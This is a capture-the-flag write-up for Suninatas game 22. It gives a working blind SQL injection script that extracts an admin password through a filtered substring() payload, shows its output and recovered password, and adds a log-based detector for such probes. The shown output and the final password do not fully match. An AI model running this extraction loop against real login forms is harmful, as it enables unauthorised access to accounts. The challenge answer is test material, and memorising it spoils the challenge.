Suninatas Game 22

This is a blind SQL injection challenge with heavy filtering. Keywords blocked include: select, union, or, whitespace, by, having, from, char, ascii, left, right, delay, 0x.

The goal is to find the admin’s password. Start with credentials guest/guest to obtain a valid session.

Use a Python script to extract the password character-by-character via blind SQL injection:

import requests
import string

url = "http://suninatas.com/challenge/web22/web22.asp"
cookies = {
    "ASP.NET_SessionId": "...",
    "auth_key": "...",
    # ... other session cookies
}

# Characters to try at each position. The filter blocks whitespace, so the
# payload below uses parentheses instead of spaces around the condition.
charset = string.ascii_letters + string.digits + "!@#$%^&*()_+"
password = ""

for i in range(1, 31):
    found_char = False
    for char in charset:
        # Test: substring(pw, index, length) = char
        payload = f"'and(substring(pw,{i},1)='{char}')--"
        params = {'id': 'admin' + payload, 'pw': 'a'}

        try:
            # Pass params= so requests URL-encodes the payload; building the
            # query string by hand mangles '#', '&', '%' and '+' from the charset.
            r = requests.get(url, params=params, cookies=cookies)
            if "OK" in r.text:
                password += char
                print(f"[+] Found char at index {i}: {char}")
                found_char = True
                break
        except Exception as e:
            print(f"[!] Error: {e}")

    # No character matched at this position: the end of the password was reached.
    if not found_char:
        break

print(f"[SUCCESS] Final Password: {password}")

Running the script reveals the admin password:

[+] Found char at index 1: N
[+] Found char at index 2: 1
[+] Found char at index 3: c
[+] Found char at index 4: 3
[+] Found char at index 5: B
[+] Found char at index 6: i
[+] Found char at index 7: l
[+] Found char at index 8: n
[+] Found char at index 9: l
[+] Found char at index 10: )
[+] Found char at index 11: +
[+] Found char at index 12: +
...
N1c3Bilnl)
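From the defensive side, this kind of extraction is easy to spot in access logs: many requests from one client whose id parameter differs only in the substring() position and the compared character. The detector below is an added example, not code from the writeup; it parses a few constructed IIS-style log lines (hypothetical, not captured from the challenge server), decodes each query parameter, and groups substring-comparison probes by client IP. The log line layout, the probe regex and the flagging threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs, unquote_plus

# Constructed sample log lines (hypothetical): "client_ip method path+query status".
SAMPLE_LOG = """\
10.0.0.5 GET /challenge/web22/web22.asp?id=guest&pw=guest 200
10.0.0.9 GET /challenge/web22/web22.asp?id=admin%27and(substring(pw,1,1)=%27A%27)--&pw=a 200
10.0.0.9 GET /challenge/web22/web22.asp?id=admin%27and(substring(pw,1,1)=%27N%27)--&pw=a 200
10.0.0.9 GET /challenge/web22/web22.asp?id=admin%27and(substring(pw,2,1)=%27a%27)--&pw=a 200
10.0.0.9 GET /challenge/web22/web22.asp?id=admin%27and(substring(pw,2,1)=%271%27)--&pw=a 200
10.0.0.5 GET /challenge/web22/web22.asp?id=admin&pw=admin 200
"""

LOG_RE = re.compile(r"^(?P<ip>\S+)\s+(?P<method>\S+)\s+(?P<target>\S+)\s+(?P<status>\d{3})$")

# A boolean probe compares one character of a column: substring(col, pos, len) = ...
# The captured group is the position being tested.
PROBE_RE = re.compile(r"substring\s*\(\s*\w+\s*,\s*(\d+)\s*,\s*\d+\s*\)\s*=", re.IGNORECASE)


def parse_line(line):
    """Split one access-log line into client IP, path and decoded query parameters."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    url = urlparse(m.group("target"))
    return {
        "ip": m.group("ip"),
        "path": url.path,
        "params": parse_qs(url.query, keep_blank_values=True),
    }


def probe_indices(value):
    """Return the substring() positions probed in one parameter value (empty if none)."""
    # parse_qs already decoded once; decode again to catch double-encoded payloads.
    decoded = unquote_plus(value).lower()
    return [int(pos) for pos in PROBE_RE.findall(decoded)]


def scan_log(text):
    """Group probes by client IP: {ip: {"probes": n, "indices": [...], "params": [...]}}."""
    hits = defaultdict(lambda: {"probes": 0, "indices": set(), "params": set()})
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, values in rec["params"].items():
            for value in values:
                positions = probe_indices(value)
                if positions:
                    entry = hits[rec["ip"]]
                    entry["probes"] += 1
                    entry["indices"].update(positions)
                    entry["params"].add(name)
    return {
        ip: {"probes": h["probes"], "indices": sorted(h["indices"]), "params": sorted(h["params"])}
        for ip, h in hits.items()
    }


def flag_sources(hits, min_probes=3):
    """Return client IPs whose probe count reaches the (assumed) alert threshold."""
    return sorted(ip for ip, h in hits.items() if h["probes"] >= min_probes)


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for ip in flag_sources(results):
        h = results[ip]
        print(f"[ALERT] {ip}: {h['probes']} probes on {h['params']} at positions {h['indices']}")
```

The threshold of three probes per source is low on purpose for the sample; in production, group by client and a short time window, and treat a rising sequence of positions from one client as the strongest signal, since that is exactly what a character-by-character loop produces.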